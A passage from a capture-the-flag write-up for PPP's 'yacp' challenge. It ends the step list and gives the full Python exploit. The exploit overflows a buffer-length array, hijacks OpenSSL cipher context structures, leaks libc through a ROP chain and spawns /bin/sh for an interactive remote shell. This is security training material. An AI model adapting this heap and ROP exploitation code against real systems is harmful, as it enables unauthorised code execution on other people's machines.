  6. Append enough bytes to the fake chunk to fill up to the length contained in the encrypted padding from step 3. and make sure to overwrite the CIPHER_CTXT pointer in the .bss with the value of the chunk from step 5.
  7. Place the encrypted chunk in three adjacent buffers starting at the block index that will be assigned the increased length after corrupting the user_chunk_len array.
  8. Put a string of 0x800 bytes with value 0x41 into buffer 31.
  9. Encrypt buffer 31 with the prepared key and IV from steps 1. and 2. to overflow the user_cunk_len array.
  10. Decrypt the chunk (with now extended length) placed in step 7. and store the decrypted contents in chunk 31 to overflow into the CIPHER_CTXT struct.
  11. From here on, the server will call EVP_CipherFinal_ex which triggers the stack switch into ROP chain stage one.
  12. Receive the libc address off puts that stage one generated and calculate the offset of system.
  13. Send the second stage ROP chain that actually calls system("/bin/sh").
  14. Switch to an interactive shell.

Easy, right? ;) Thanks for the fun challenge, PPP!

This is the full exploit:

#!/usr/bin/env python3

import struct, socket, time, sys, telnetlib, binascii, re, itertools, hashlib
from Crypto.Cipher import AES

def until(sock, s):
    tmp = b''
    recv = b''
    while s not in tmp:
        try:
            recv = sock.recv(1)
        except socket.timeout:
            return b""
            print('\x1b[31moooops, timeout on recv {}\x1b[39m'.format(s))
            sys.exit(-1)
        if len(recv) == 0:
            return b""
            print('\x1b[31moooops, ret 0 on recv {}\x1b[39m'.format(s))
            sys.exit(-1)
        tmp += recv

    return tmp

local = True

ovf_chunk = 31
iv_chunk = 27
key_chunk = 29
dat_chunk = 28
fake_chunk = 2

if local:
    saddr=('localhost', 55555)
    #puts_offset = 0x5f870 lawl
    puts_offset = 0x5fca0
    system_offset = 0x3ada0
else:
    saddr=('yacp.chal.pwning.xxx', 7961)
    puts_offset = 0x5fca0
    system_offset = 0x3ada0

p = lambda x: struct.pack("<I", x)

key = p(0x00fda56) + b"\x00" * 0x1c
iv = b"\x00" * 4 + p(0x080498f9) + b"\x00" * 8

## second stage rop chain executed at the end when stack switching through the
## iv XD

chain = b"\x00" * 0x14 ## padding between iv and chain (add esp, 0x1c)
chain += p(0x61616161)  ## ebx
chain += p(0x62626262)  ## esi
chain += p(0x63636363)  ## edi
chain += p(0x64646464)  ## ebp
chain += p(0x08048960)  ## puts@plt
chain += p(0x080495F9)  ## pop edi; ret
chain += p(0x0804C034)  ## puts@got
chain += p(0x08048A30)  ## scanf@plt
chain += p(0x08048ee2)  ## pop edi; pop ebp; ret
chain += p(0x08049B93)  ## string with %s
chain += p(0x08059930)  ## target for scanf (stack will be right here later)

assert len(key) == 32

sock = socket.socket()
sock.connect(saddr)
sock.settimeout(4)

if not local:
    ## solve hash
    r = b''
    while True:
        r += sock.recv(4096)
        if b'Magic word? ' in r:
            break
    #print(r)
    m = re.search(b'starts with ([a-f0-9]+) and is ([0-9]+)',r)
    word =m.group(1)
    l = int(m.group(2))

    print("[+] Solving hash for {} with length {}".format(word.decode(), l))

    t = '0123456789abcdef'

    for x in itertools.product(t,repeat=(l-len(word))):
        mw = word+''.join(x).encode()
        h = hashlib.sha256(mw).hexdigest()

        if h[0:6]=='ffffff' and int(h[6:8],16) > 0xef:
            break

    print(h,mw,len(mw))
    sock.sendall(mw)


until(sock, b"5. Display data")

print("[+] Placing key in memory ...")

sock.send(b'0\n') ## load_data

until(sock, b"How many bytes is the data?")
sock.send("{}\n".format(len(key)).encode())
sock.send("{}\n".format(key_chunk).encode())

sock.send(binascii.hexlify(key) + b"\n")

until(sock, b"5. Display data")

print("[+] Placing iv and ROP chain in memory ...")

sock.send(b'0\n') ## load_data

until(sock, b"How many bytes is the data?")
sock.send("{}\n".format(len(iv + chain)).encode())
sock.send("{}\n".format(iv_chunk).encode())

sock.send(binascii.hexlify(iv + chain) + b"\n")

until(sock, b"5. Display data")

print("[+] Placing encrypted fake chunk ...")

pwn = b""
pwn += p(0x1ab)  ## place fake md_struct here
pwn += p(0x10)
pwn += p(0x20)
pwn += p(0x10)
pwn += p(0x101002)  ## set EVP_CIPH_FLAG_CUSTOM_CIPHER
#pwn += p(0x1002)
pwn += p(0x41414141)
#pwn += p(0x42424242)
#pwn += p(0x08048FF6) ## getline
#pwn += p(0x41414141)
pwn += p(0x08048c38)
pwn += p(0)
pwn += p(0xfc)
pwn += p(0x43434343) * 7

while len(pwn) < 0x800:
    pwn += b"D"

pwn += b"\x00" * 0x98
pwn += p(0x805b8e0)

pwn += b"G" * 0x90

pwn += p(0x805b8e0 + 0x40)

while len(pwn) < 0x15ff:
    pwn += b"E"

while len(pwn) & 0xf:
    pwn += b'F'

aes = AES.new(key, AES.MODE_CBC, iv)
pwn = aes.encrypt(pwn)

sock.send(b'0\n') ## load_data

until(sock, b"How many bytes is the data?")
sock.send("{}\n".format(0x800).encode())
sock.send("{}\n".format(fake_chunk).encode())

sock.send(binascii.hexlify(pwn[:0x800]) + b'\n')

until(sock, b"5. Display data")

sock.send(b'0\n') ## load_data

until(sock, b"How many bytes is the data?")
sock.send("{}\n".format(0x800).encode())
sock.send("{}\n".format(fake_chunk + 1).encode())

sock.send(binascii.hexlify(pwn[0x800:][:0x800]) + b'\n')

until(sock, b"5. Display data")

sock.send(b'0\n') ## load_data

until(sock, b"How many bytes is the data?")
sock.send("{}\n".format(len(pwn) - 2 * 0x800).encode())
sock.send("{}\n".format(fake_chunk + 2).encode())

sock.send(binascii.hexlify(pwn[2 * 0x800:]) + b'\n')

until(sock, b"5. Display data")

print("[+] Overwriting length of chunk 2 ...")

sock.send(b'0\n') ## load_data

until(sock, b"How many bytes is the data?")
sock.send("{}\n".format(0x800).encode())
sock.send("{}\n".format(ovf_chunk).encode())

sock.send(b"41" * 0x800 + b"\n")

until(sock, b"5. Display data")

sock.send(b'3\n') ## encrypt_data

until(sock, b"What type of cipher would you like to perform?\n")
sock.send(b"aes-256-cbc\n")

until(sock, b"For your input, ")
sock.send("{}\n".format(ovf_chunk).encode())
until(sock, b"For your output, ")
sock.send("{}\n".format(ovf_chunk).encode())
until(sock, b"For your key, ")
sock.send("{}\n".format(key_chunk).encode())
until(sock, b"For your iv, ")
sock.send("{}\n".format(iv_chunk).encode())

until(sock, b"5. Display data")

print("[+] Hijacking md_ctxt and cipher_ctxt structs ...")

sock.send(b'4\n') ## decrypt_data
until(sock, b"What type of cipher would you like to perform?\n")

sock.send(b"aes-256-cbc\n")
until(sock, b"For your input, ")
sock.send("{}\n".format(2).encode())
until(sock, b"For your output, ")
sock.send("{}\n".format(ovf_chunk).encode())
until(sock, b"For your key, ")
sock.send("{}\n".format(key_chunk).encode())
until(sock, b"For your iv, ")
sock.send("{}\n".format(iv_chunk).encode())

libc = struct.unpack("<I", sock.recv(4))[0] - puts_offset

print("[+] libc @ {:08x}".format(libc))

## yes, this is stage 3 ...

pwn = b''
pwn += p(libc + system_offset)
pwn += p(0x65656565) # fake ret addr for scanf
pwn += p(0x0805993c) # -----.
                     #      | this happily, reliably points here, everything is
                     #      | deterministic by now
pwn += b"/bin/sh\x00"   # <-'

pwn += b" and is %d characters long.\n" ## make the last scanf happy ;)

print("[+] Shell incoming ...")
sock.send(pwn)

sock.recv(64)

t = telnetlib.Telnet()
t.sock = sock
t.interact()